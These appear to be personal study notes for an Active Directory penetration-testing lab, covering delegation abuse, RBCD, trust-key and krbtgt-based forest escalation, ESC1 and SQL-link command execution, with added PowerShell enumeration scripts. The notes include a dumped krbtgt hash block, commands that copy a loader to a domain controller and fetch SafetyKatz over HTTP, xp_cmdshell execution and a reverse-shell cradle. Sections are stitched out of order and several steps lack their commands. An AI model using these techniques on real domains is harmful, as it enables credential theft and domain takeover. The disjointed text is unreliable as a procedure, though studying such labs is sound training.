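One query that covers the unconstrained delegation search above, the constrained delegation check with the TRUSTED_TO_AUTH_FOR_DELEGATION flag from the todo note, and resource-based delegation that is only visible by decoding a security descriptor. This is an added example, not from the lab manual; it assumes PowerView is loaded, and names nothing lab-specific (the results are whatever the DC returns).

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded.
function Get-DelegationSummary {
    # Unconstrained: TGTs of anyone who authenticates to the host are cached in its LSASS
    Get-DomainComputer -Unconstrained -Properties samaccountname | ForEach-Object {
        [pscustomobject]@{ Type = 'Unconstrained'; Principal = $_.samaccountname; Target = '*'; ProtocolTransition = '' }
    }

    # Constrained: msDS-AllowedToDelegateTo lists the SPNs the account may obtain tickets for.
    # With TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition) it can S4U2Self any user, so no
    # victim interaction is needed; without it, only users who authenticated to it can be delegated.
    $props = 'samaccountname','useraccountcontrol','msds-allowedtodelegateto'
    $constrained = @(Get-DomainUser     -LDAPFilter '(msds-allowedtodelegateto=*)' -Properties $props) +
                   @(Get-DomainComputer -LDAPFilter '(msds-allowedtodelegateto=*)' -Properties $props)
    foreach ($c in $constrained) {
        foreach ($spn in $c.'msds-allowedtodelegateto') {
            [pscustomobject]@{
                Type               = 'Constrained'
                Principal          = $c.samaccountname
                Target             = $spn
                ProtocolTransition = [bool]("$($c.useraccountcontrol)" -match 'TRUSTED_TO_AUTH_FOR_DELEGATION')
            }
        }
    }

    # Resource-based: stored on the *target* as a security descriptor whose DACL lists the
    # principals allowed to delegate to it. Any computer object we can write can be given one.
    Get-DomainComputer -Properties samaccountname,'msds-allowedtoactonbehalfofotheridentity' |
      Where-Object { $_.'msds-allowedtoactonbehalfofotheridentity' } | ForEach-Object {
        $sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $_.'msds-allowedtoactonbehalfofotheridentity', 0
        foreach ($ace in $sd.DiscretionaryAcl) {
            $who = try { ConvertFrom-SID $ace.SecurityIdentifier.Value } catch { $ace.SecurityIdentifier.Value }
            [pscustomobject]@{ Type = 'RBCD'; Principal = $who; Target = $_.samaccountname; ProtocolTransition = '' }
        }
    }
}

Get-DelegationSummary | Format-Table -AutoSize
```

Read the Constrained rows with the SPN in mind: the service class in the ticket is not validated by most services, so a principal allowed to delegate to TIME/host can usually request CIFS/host or HTTP/host instead (Rubeus' /altservice), which is what turns a harmless-looking entry into file system or remoting access.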
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
[!important] In case you want to use Kekeo instead of Rubeus, check "Abuse Constrained Delegation using dcorp-adminsrv with Kekeo" in the lab manual
[!bug] Learning Objective 17
Find a computer object in dcorp domain where we have Write permissions.
Abuse the Write permissions to access that computer as Domain Admin.
Solution -:
Start up a PowerShell session using Invisi-Shell
Enumerate Write permissions for a user that we have compromised -:
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Enum writes for all users
Find-InterestingDomainACL | select IdentityReferenceName, ActiveDirectoryRights
# Enum writes for a specific user
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
# Note that the most important value in 'ActiveDirectoryRights' is 'GenericWrite';
# this is what we are looking for (GenericAll, or WriteProperty on the right attribute, also works)
[!hint] After trying multiple users, or by using BloodHound, we find that ciadmin (the user we got from the Jenkins instance) has Write permissions on the computer object of dcorp-mgmt
Let's use the reverse shell that we have and load PowerView there
Go ahead and get a reverse shell as ciadmin with the Jenkins instance
Set up Resource-Based Constrained Delegation (RBCD) on dcorp-mgmt so that the student VM's machine account can delegate to it (the same change works for any student VM in the lab)
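The "try from multiple users" step done as one query: check the ACLs of every computer object against the principals compromised so far, so the target for RBCD falls out of the data instead of trial and error. This is an added example, not from the lab manual; it assumes PowerView is loaded. The default principal list is the set of accounts compromised in these notes; pass any list.

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded.
function Find-WritableComputerObjects {
    param([string[]]$Principals = @('dcorp\studentx','dcorp\ciadmin','dcorp\appadmin','dcorp\srvadmin','dcorp\websvc'))

    # Resolve the principals we control to SIDs once; ACEs carry SIDs, not names
    $sidMap = @{}
    foreach ($p in $Principals) {
        $sid = ConvertTo-SID $p
        if ($sid) { $sidMap[[string]$sid] = $p } else { Write-Warning "Cannot resolve $p" }
    }

    # Any of these lets us set msDS-AllowedToActOnBehalfOfOtherIdentity, directly or after a DACL change
    $writeRights = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner'

    Get-DomainComputer -Properties distinguishedname,samaccountname |
        Get-DomainObjectAcl -ResolveGUIDs |
        Where-Object { $sidMap.ContainsKey([string]$_.SecurityIdentifier) -and
                       $_.ActiveDirectoryRights -match $writeRights } |
        Select-Object @{n='Who';    e={ $sidMap[[string]$_.SecurityIdentifier] }},
                      @{n='Target'; e={ $_.ObjectDN -replace '^CN=([^,]+),.*', '$1' }},
                      ActiveDirectoryRights,
                      @{n='Attribute'; e={ $_.ObjectAceType }},   # "All" or the specific attribute
                      @{n='NextStep';  e={
                          if ($_.ActiveDirectoryRights -match 'GenericAll|GenericWrite') { 'set RBCD' }
                          elseif ($_.ObjectAceType -match 'Allowed-To-Act-On-Behalf')    { 'set RBCD (attribute right)' }
                          elseif ($_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner') { 'grant yourself GenericAll first' }
                          else { 'WriteProperty on another attribute: check what it is' } }}
}

Find-WritableComputerObjects | Format-Table -AutoSize -Wrap
```

This only matches ACEs granted to the listed accounts directly; rights inherited through group membership (RDPUsers, for instance) show up under the group's SID, so add the groups the compromised users belong to when the direct check comes back empty.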
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.
Solution -:
Step 1 - Retrieve the trust key for the dollarcorp and moneycorp trust using Mimikatz or SafetyKatz.
Start a process with DA privileges (run the command from an elevated prompt)
Run the following commands from the process running as Domain Admin to copy Loader.exe to dcorp-dc and use it to extract the trust key. Note that the trust key may be different in your lab instance
# copy loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# spawn interactive shell on dcorp-dc
winrs -r:dcorp-dc cmd
# set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X
# Load loader.exe on memory of dcorp-dc
# Make sure to host SafetyKatz.exe on HFS first
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Extract credentials on the new mimikatz session
lsadump::trust /patch
Step 2 - Use the extracted information to forge a ticket
Forge a ticket with SID History of Enterprise Admins. Run the below command from an elevated command prompt
Step 3 - Try to access the file system of the forest root DC (mcorp-dc)
Check if we can access file system on mcorp-dc!
dir \\mcorp-dc.moneycorp.local\c$
[!bug] Learning Objective 19
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Solution -:
We already have the krbtgt hash from dcorp-dc using DCsync attack. Let's create the inter-realm TGT and inject. Run the below command from an elevated command prompt
Run the commands below from the process running as DA to copy Loader.exe to dcorp-dc and use it to extract credentials. Note that the trust key may be different in your lab instance:
# copy loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# get interactive shell
winrs -r:dcorp-dc cmd
# enable port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x
# Make sure to host SafetyKatz.exe on HFS
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Extract credentials on the new mimikatz session
lsadump::trust /patch
Example -:
[!note] Make sure you don't make the mistake of copying the trust key (rc4_hmac_nt) of MONEYCORP.LOCAL instead of EUROCORP.LOCAL for the "/rc4:" parameter of the command below; scrolling down a little in the command output will help
Forge an inter-realm TGT. Run command from an elevated command prompt
[!note] Sweet! The HTTPSCertificates template grants enrollment rights to the RDPUsers group and allows the requester to supply the Subject Name (ESC1). Recall that studentx is a member of RDPUsers. This means we can request a certificate for any user as studentx.
Request a certificate for Domain Admin - Administrator
[!tip] To know how to do Privilege Escalation to DA and EA using ESC3 and ESC6, Check Lab Manual, I only practiced it, but did not take notes, in the exam lab, make sure to refer to lab manual and check both of them
[!bug] Learning Objective 22
Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql.
Solution -:
We start by enumerating SQL servers in the domain and checking whether studentx has privileges to connect to any of them. We can use the PowerUpSQL module for that
Sweet! We have sysadmin set to 1, which means True, on the eu-sql33 server!
Let's try to get command execution on eu-sql33
# -Instance : the first SQL instance (where the crawl starts)
# -Query : command to run
# -QueryTarget : the linked server where we have sysadmin
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql33
Example Output
Let's execute a PowerShell download-execute cradle to run a PowerShell reverse shell on the eu-sql33 instance. Remember to start a listener
Make sure to start HFS first and upload sbloggingbypass.txt, amsibypass.txt and Invoke-PowerShellTcpEx.ps1 so that they are hosted
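The enumeration half of this objective (find instances, test the login, crawl the links, pick the hops where we are sysadmin) as one function. This is an added example, not from the lab manual; it assumes PowerUpSQL is dot-sourced and that the session runs as a domain user. Only the instance names that come out are the lab's; the function itself is generic.

```powershell
# Added example, not part of the lab manual. Assumes PowerUpSQL is loaded (. .\PowerUpSQL.ps1).
function Get-SqlLinkAttackSurface {
    # 1. Find SQL instances via their SPNs and keep only those our current token can log in to
    $reachable = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded | Where-Object Status -eq 'Accessible'

    foreach ($i in $reachable) {
        $info = Get-SQLServerInfo -Instance $i.Instance
        # 2. Crawl linked servers from this entry point; every hop reports the login used and
        #    whether that login is sysadmin on the hop. Without -Query it only maps the links.
        $hops = Get-SQLServerLinkCrawl -Instance $i.Instance
        foreach ($h in $hops) {
            [pscustomobject]@{
                Entry        = $i.Instance
                EntryIsAdmin = $info.IsSysadmin
                Hop          = $h.Instance
                Path         = ($h.Path -join ' -> ')   # chain of links that reaches the hop
                HopIsAdmin   = $h.Sysadmin              # 1 = sysadmin on the hop
                HopUser      = $h.User
                Version      = $h.Version
            }
        }
    }
}

$surface = Get-SqlLinkAttackSurface
$surface | Format-Table -AutoSize -Wrap

# 3. Hops where we are sysadmin over a link are the targets: xp_cmdshell can be enabled there
#    through the link (the link needs "RPC Out" for EXECUTE ... AT to work) and used for execution.
$targets = $surface | Where-Object { $_.HopIsAdmin -eq 1 -and $_.Hop -ne $_.Entry }
foreach ($t in $targets) {
    Get-SQLServerLinkCrawl -Instance $t.Entry -QueryTarget $t.Hop -Query "exec master..xp_cmdshell 'whoami'" |
        Select-Object Instance, CustomQuery
}
```

The Path column is the part to keep from this: a reverse shell on eu-sql33 runs in the eurocorp forest even though every link was followed from dcorp-mssql with dollarcorp credentials, which is why database links are treated as a trust boundary crossing and not just an application issue.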